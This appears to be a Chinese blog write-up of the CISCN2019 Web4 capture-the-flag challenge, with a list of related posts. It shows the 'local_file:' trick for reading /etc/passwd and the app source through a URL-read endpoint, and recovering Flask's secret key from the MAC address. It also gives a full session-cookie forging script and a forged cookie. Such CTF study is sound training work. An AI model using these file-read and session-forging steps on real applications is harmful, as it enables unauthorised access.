[CISCN2019 华东南赛区]Web4

最新推荐文章于 2023-11-12 16:48:30 发布
最新推荐文章于 2023-11-12 16:48:30 发布
阅读量693 收藏
点赞数
分类专栏: 2019CISCN_WEB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44190459/article/details/116775237
版权

[CISCN2019 华东南赛区]Web4

进入环境,只有一个链接,点进去是百度


但是这个url似乎暴露了些什么
http://8c38a640-615b-48e3-9cf7-a6c197cd2ab8.node3.buuoj.cn/read?url=https://baidu.com,分别试一下url=/etc/passwd url=file:///etc/passwd
url=local_file:etc/passwd,发现file:回应了nohack,另外两个打开了文件。


然后可以尝试读取源码app/app.py
在这里插入图片描述

源码如下,可以发现在url页面中flag与file都被过滤了,只有当我们的username为fuck时,才能拿到flag,username在session中,用burp抓个包,访问/falg

 import re, random, uuid, urllib 
 from flask import Flask, session, request
 
 app = Flask(__name__)
 random.seed(uuid.getnode()) 
 app.config['SECRET_KEY'] = str(random.random()*233) 
 app.debug = True 

@app.route('/') 
def index(): 
		session['username'] = 'www-data' 
		return 'Hello World! Read somethings' 

@app.route('/read') 
def read(): 
		try: 
				url = request.args.get('url') 
				m = re.findall('^file.*', url, re.IGNORECASE) 
				n = re.findall('flag', url, re.IGNORECASE) 
				if m or n: 
				return 'No Hack' 
				res = urllib.urlopen(url) 
				return res.read() 
			except Exception as ex: 
				print str(ex) 
			return 'no response' 
@app.route('/flag')
 def flag(): 
 		if session and session['username'] == 'fuck': 
 			return open('/flag.txt').read() 
 		else:
 			return 'Access denied'
 if __name__=='__main__': 
 		app.run( 
 				debug=True, 
 				host="0.0.0.0"
 				 )

可以看到session中加密的内容,通过.隔开的3段内容,第一段其实就是base64 encode后的内容,但去掉了填充用的等号,若decode失败,自己需要补上1-3个等号补全。中间内容为时间戳,在flask中时间戳若超过31天则视为无效。最后一段则是安全签名,将sessiondata,时间戳,和flask的secretkey通过sha1运算的结果。

通过base64解码可以得到前面的内容是{“username”:{" b":“d3d3LWRhdGE=”},其中d3d3LWRhdGE=是www-data的base64编码,从源码中也可以看出来,然后源码中可以看到Secre_Key的生成方式,其中用于生成伪随机数seed的函数uuid.getnode(),用来获取Mac地址并且将其转换为整数,那么需要我们先读取Mac地址,read?url=/sys/class/net/eth0/address,读取到mac地址为02:42:ac:10:ae:6d

 random.seed(uuid.getnode()) 
 app.config['SECRET_KEY'] = str(random.random()*233)

然后可以编写脚本获得Secre_Key,需要在python2下运行因为生成的位数会不一样,得到结果为205.110268101

import random
random.seed(0x0242ac10ae6d)
print(str(random.random()*233))

然后便可以利用以下脚本伪造session了

#!/usr/bin/env python3
""" Flask Session Cookie Decoder/Encoder """
__author__ = 'Wilson Sumanang, Alexandre ZANNI'

# standard imports
import sys
import zlib
from itsdangerous import base64_decode
import ast

# Abstract Base Classes (PEP 3119)
if sys.version_info[0] < 3: # < 3.0
    raise Exception('Must be using at least Python 3')
elif sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
    from abc import ABCMeta, abstractmethod
else: # > 3.4
    from abc import ABC, abstractmethod

# Lib for argument parsing
import argparse

# external Imports
from flask.sessions import SecureCookieSessionInterface

class MockApp(object):

    def __init__(self, secret_key):
        self.secret_key = secret_key


if sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
    class FSCM(metaclass=ABCMeta):
        def encode(secret_key, session_cookie_structure):
            """ Encode a Flask session cookie """
            try:
                app = MockApp(secret_key)

                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)

                return s.dumps(session_cookie_structure)
            except Exception as e:
                return "[Encoding error] {}".format(e)
                raise e


        def decode(session_cookie_value, secret_key=None):
            """ Decode a Flask cookie  """
            try:
                if(secret_key==None):
                    compressed = False
                    payload = session_cookie_value

                    if payload.startswith('.'):
                        compressed = True
                        payload = payload[1:]

                    data = payload.split(".")[0]

                    data = base64_decode(data)
                    if compressed:
                        data = zlib.decompress(data)

                    return data
                else:
                    app = MockApp(secret_key)

                    si = SecureCookieSessionInterface()
                    s = si.get_signing_serializer(app)

                    return s.loads(session_cookie_value)
            except Exception as e:
                return "[Decoding error] {}".format(e)
                raise e
else: # > 3.4
    class FSCM(ABC):
        def encode(secret_key, session_cookie_structure):
            """ Encode a Flask session cookie """
            try:
                app = MockApp(secret_key)

                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)

                return s.dumps(session_cookie_structure)
            except Exception as e:
                return "[Encoding error] {}".format(e)
                raise e


        def decode(session_cookie_value, secret_key=None):
            """ Decode a Flask cookie  """
            try:
                if(secret_key==None):
                    compressed = False
                    payload = session_cookie_value

                    if payload.startswith('.'):
                        compressed = True
                        payload = payload[1:]

                    data = payload.split(".")[0]

                    data = base64_decode(data)
                    if compressed:
                        data = zlib.decompress(data)

                    return data
                else:
                    app = MockApp(secret_key)

                    si = SecureCookieSessionInterface()
                    s = si.get_signing_serializer(app)

                    return s.loads(session_cookie_value)
            except Exception as e:
                return "[Decoding error] {}".format(e)
                raise e


if __name__ == "__main__":
    # Args are only relevant for __main__ usage
    
    ## Description for help
    parser = argparse.ArgumentParser(
                description='Flask Session Cookie Decoder/Encoder',
                epilog="Author : Wilson Sumanang, Alexandre ZANNI")

    ## prepare sub commands
    subparsers = parser.add_subparsers(help='sub-command help', dest='subcommand')

    ## create the parser for the encode command
    parser_encode = subparsers.add_parser('encode', help='encode')
    parser_encode.add_argument('-s', '--secret-key', metavar='<string>',
                                help='Secret key', required=True)
    parser_encode.add_argument('-t', '--cookie-structure', metavar='<string>',
                                help='Session cookie structure', required=True)

    ## create the parser for the decode command
    parser_decode = subparsers.add_parser('decode', help='decode')
    parser_decode.add_argument('-s', '--secret-key', metavar='<string>',
                                help='Secret key', required=False)
    parser_decode.add_argument('-c', '--cookie-value', metavar='<string>',
                                help='Session cookie value', required=True)

    ## get args
    args = parser.parse_args()

    ## find the option chosen
    if(args.subcommand == 'encode'):
        if(args.secret_key is not None and args.cookie_structure is not None):
            print(FSCM.encode(args.secret_key, args.cookie_structure))
    elif(args.subcommand == 'decode'):
        if(args.secret_key is not None and args.cookie_value is not None):
            print(FSCM.decode(args.cookie_value,args.secret_key))
        elif(args.cookie_value is not None):
            print(FSCM.decode(args.cookie_value))

然后在终端运行该脚本时键入以下参数
encode -s '205.110268101' -t "{'username': b'fuck'}"
得到了伪造的session
eyJ1c2VybmFtZSI6eyIgYiI6IlpuVmphdz09In19.YJ1z2g.N1dN_wquln67jRHKwXox7c0kgl8

然后修改掉burp中数据包的session部分,即可得到flag

JJT_with_hair
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
华东交通大学2013-2019年数据结构.pdf
10-25
华东交通大学2013-2019年数据结构.pdf
华东师范大学2019计算机考研839试卷及答案(2019年839回忆版)
01-07
华东师范大学2019计算机考研839试卷及答案
第九届飞思卡尔摄像头华东赛区一等奖程序
08-24
参加第九届飞思卡尔智能车竞赛,并获得华东赛区一等奖,主控芯片是K60,摄像头用的是OV7620,图像读取用的是DMA。
Double ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之Double ciscn 2019 第十二届全国大学生信息安全竞赛
题解([RootersCTF2019]I_<3_Flask,[CISCN2019 华东赛区]Double Secret,[CISCN2019 华东赛区]Web4)
2202_75361164的博客
11-12 135
抓取/flag,并且将session更改为:eyJ1c2VybmFtZSI6eyIgYiI6IlpuVmphdz09In19.ZUjA4g.TDHugXodYeccRQbQmc1SZh9CffA。直接看/flag路由,发现session[‘username’] == 'fuck’时给flag,所以要伪造session,不过我们需要先得到密钥。发现被过滤了,有点不对劲,尝试/index.php发现404,推测为python,尝试。成功,尝试读取/flag,被过滤了。3.读取/app/app.py。
BUUCTF:[CISCN2019 华东赛区]Web4
末初的CSDN博客
07-29 2040
题目地址:https://buuoj.cn/challenges#[CISCN2019%20%E5%8D%8E%E4%B8%9C%E5%8D%97%E8%B5%9B%E5%8C%BA]Web4 这种路由处理方式并不像是PHP,尝试了file:///etc/passwd没有效果,猜测Flask,尝试local_file:///读取文件 读取源码: import re, random, uuid, urllib from flask import Flask, session, request app
华东师范大学2019 839.docx
06-25
华东师范大学计算机技术(085211)839 2019年真题回忆版以及答案
BUUCTF--[CISCN2019 华东赛区]Web4
qq_46263951的博客
07-27 541
Jwt认识与攻击
[CISCN2019 华东赛区]Web4 FLASK的session伪造
qq_54929891的博客
05-24 529
进入网站后点击read something看见一个疑似远程文件泄露 尝试了一下伪协议filter没有反应,file被禁用了 到这里我就卡住了,我想不到还有什么可以远程读取文件的了 学习得知大佬们一看这个路由就不像是php的,于是盲猜是python的FLASK框架,利用load_file来读取源文件(我查不到这个读取的来源,不理解为啥是这个) 可以打开etc/passwd,从最后一行可以看到最后一个用户执行了/app目录下的一个/bin/ash命令,也就意味着我们当前在/app目录的上..
[CISCN2019 总决赛 Day1 Web4]Laravel1
nigo134的博客
06-17 879
反序列化漏洞laravel pop链的挖掘显而易见的考察反序列化漏洞,并且告诉了备份source.tar.gz,直接下载下来开始找pop链。反序列化的触发点一般为__wakeup()或者__destruct(),更多的是destruct,先找destruct。使用phpstrom,Ctrl+Shift+R查找function __destruct:通过逐个分析找到一个可以文件包含的链, TagAwareAdapter类: 调用过程:__destruct() -> commit() -> invalidat
[CISCN2019 总决赛 Day1 Web4]Laravel1-PHP代码审计学习
cjdgg的博客
03-16 758
题目就是简单的几行代码,看到了反序列化函数,还提示了有源代码,那就说明得审代码找POP链咯 源码下了文件还挺多的,这会就有点懵逼了,文件这么多一个一个的找得找到猴年马月啊。 无奈之下上网翻一翻网上审Laravel的文章,发现了可以先全局搜索缩小范围(Sublimetext中是快捷键ctrl+shift+f),提高速率,我搜了下_destruct 找到了不少,双击就可以去到文件文件里面具体查看,接下来就是一个个去看有没有发现有用的吧 第一次审这么大的文件,东西太多太杂,没啥经验,没看出啥,只能找篇大佬的.
BUUCTF:[CISCN2019 华东赛区]Web4 ---- jwt的加密,解密 复习 ---- 一个奇怪的 jwt 的secret方法
Zero_Adam的博客
04-19 836
目录:一、自己做:1.没有思路啦,,2.没有思路啦,,二、学到的&&不足:三、学习WP 一、自己做: **注:**没有思路的地方,就是我看WP的地方。 解解jwt瞅瞅, 有加密的东西,我目前遇到过的jwt解法:弱密钥碰撞,碰撞出密钥来,就可以修改数据了,二:无密钥检测,用python重写一个无验证的jwt,有可能也成功, 再是一个进阶的方法:如果是SA256不对称加密的化,我们没办法破解,但是可以用SH256加密的方法巴拉巴拉给弄出来,没遇到过题,然后懒,,没有细细研究, 我*???,我正
BUUCTF-[CISCN2019 华东赛区]Web4
AndyNoel的博客
05-12 487
BUUCTF-[CISCN2019 华东赛区]Web4 看题 点击Read somethings,会跳转到 http://3fd8b1f9-614f-47ff-8e79-0f678e7bb4eb.node3.buuoj.cn/read?url=https://baidu.com 看url应该不是PHP,因为PHP几乎没有用这种路由,直接猜flask。使用read?url=local_file:///etc/passwd读取内容。 读取源码:read?url=local_file:///app/app.
BUUCTF [CISCN2019 华东赛区]Web4
SanKobe的博客
05-24 244
注意这里有个坑,目标地址设备是用python2跑的,而我这里是python3,之前我一直用这个当SECRET_KEY,然后一直跑不出flag,百度了一下,python2和python3 random出来的位数是不一样的。最近打比赛遇到了flask_session伪造相关的题目,没学过,又碰巧随机挑了道BUUCTF的题目正好考的flask_session伪造,看完各位师傅的WP后,进行一次自我总结。百度了一下linux下设备网卡地址在/sys/class/net/eth0/address下。
华东师范大学数理统计pdf
最新发布
12-08
华东师范大学数理统计pdf是一份关于该大学数理统计学科的电子文档,其内容涵盖了该学科的理论知识、研究成果和应用方向等。这份pdf文档很可能是华东师范大学数理统计学科相关的教材、学术论文集、研究报告或者课程...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值